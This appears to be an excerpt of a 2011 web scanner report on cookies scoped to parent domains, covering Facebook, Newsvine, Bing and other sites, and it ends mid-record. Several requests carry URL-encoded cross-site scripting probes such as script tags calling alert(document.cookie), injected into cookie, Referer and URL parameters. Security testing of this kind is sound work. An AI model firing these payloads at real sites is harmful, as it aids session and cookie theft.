GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:38 GMT Content-Length: 11463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HelenASPopkin HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:48 GMT Content-Length: 14974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/impression.php?campaign_id=137675572948107&partner_id=thelastword.msnbc.msn.com&placement=like_button&extra_1=http%3A%2F%2Fthelastword.msnbc.redacted%2F%3F1406b%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2b8d8f3d529%3D1&extra_2=US HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=600&action=recommend&colorscheme=light&href=http://thelastword.msnbc.msn.com/_news/2011/01/27/5937356-kind-desk-delivery-update Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS; wd=90x20
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dthelastword.msnbc.redacted%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fthelastword.msnbc.redacted%252F%253F1406b%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E2b8d8f3d529%253D1%26extra_2%3DUS; expires=Tue, 01-Mar-2011 12:48:02 GMT; path=/; domain=.facebook.com; httponly X-Cnection: close Date: Sun, 30 Jan 2011 12:48:02 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:50 GMT Content-Length: 10625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /todd.kenreck HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:49 GMT Content-Length: 14802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1 Host: www.hoovers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:53:36 GMT Server: Apache Cache-Control: max-age=3600 Expires: Sun, 30 Jan 2011 02:53:36 GMT X-Powered-By: PHP/5.2.8 Content-Type: text/html Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/ P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE" Connection: close Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/ Content-Length: 18009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Take Th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.iis.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 34019 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: CSAnonymous=m0d2Yg7AywEkAAAAYzgxZWJhOTEtZjliYS00OWY2LWI5MmMtZGY2NmY1Y2VkOWJl0; domain=iis.net; expires=Sat, 29-Jan-2011 23:43:52 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> The Official M ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.live.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; LD=3871a7c5-0acf-46b1-b76d-faebaecf0536_00d7c3a81b1_15501_1294800676304=L5708&3871a7c5-0acf-46b1-b76d-faebaecf0536_00e1e3469a5_15501_1294800680668=L3088|U46904782&3871a7c5-0acf-46b1-b76d-faebaecf0536_00ea893c9b1_15501_1294800680555=L3271~sw:1920~sh:1200~c:16~bw:1142~bh:750&3871a7c5-0acf-46b1-b76d-faebaecf0536_00a12627c20_15501_1294800670164=U46914446&3871a7c5-0acf-46b1-b76d-faebaecf0536_004401fc3dc_15501_1294800633344=U46951808&3871a7c5-0acf-46b1-b76d-faebaecf0536_00b4d7765d1_15501_1294800671751=U46913589
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.morningstar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/8004316/?from=en-us_msnhp HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:13:58 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 55258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/article/emailThis HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:40 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 2 Content-Type: text/html; charset=UTF-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_action/user/logout HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:40 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com Pragma: no-cache Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F412586518 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/user/startTracking HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:46 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 1 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/user/stopTracking HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:41 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 1 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_api/comments/getComments HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:32 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:32 GMT Content-Length: 65 Content-Type: application/json Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_api/question/getUserData HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:30 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com Set-Cookie: sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:30 GMT Content-Length: 244 Content-Type: application/json Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_api/user/convTracker HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:37 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:37 GMT Content-Length: 304 Content-Type: application/json Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 03:13:08 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/accounts/newsvine/emailAlerts Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:26 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/api/accounts/login Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_tools/user/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:04 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 17589
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_vine/js/m1/global.js?v=23247 HTTP/1.1 Host: www.newsvine.com Proxy-Connection: keep-alive Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:20:53 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com Pragma: no-cache Cache-Control: max-age=604800 Expires: Sun, 06 Feb 2011 17:20:53 GMT Content-Length: 383 Content-Type: text/javascript
var globalPokeURL = 'http://log.newsvine.com/poke.gif'; var globalImgRoot = 'http://www.newsvine.com/_vine/images/_/'; var globalRegisterRoot = 'https://www.newsvine.com/_nv/accounts/register'; v ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
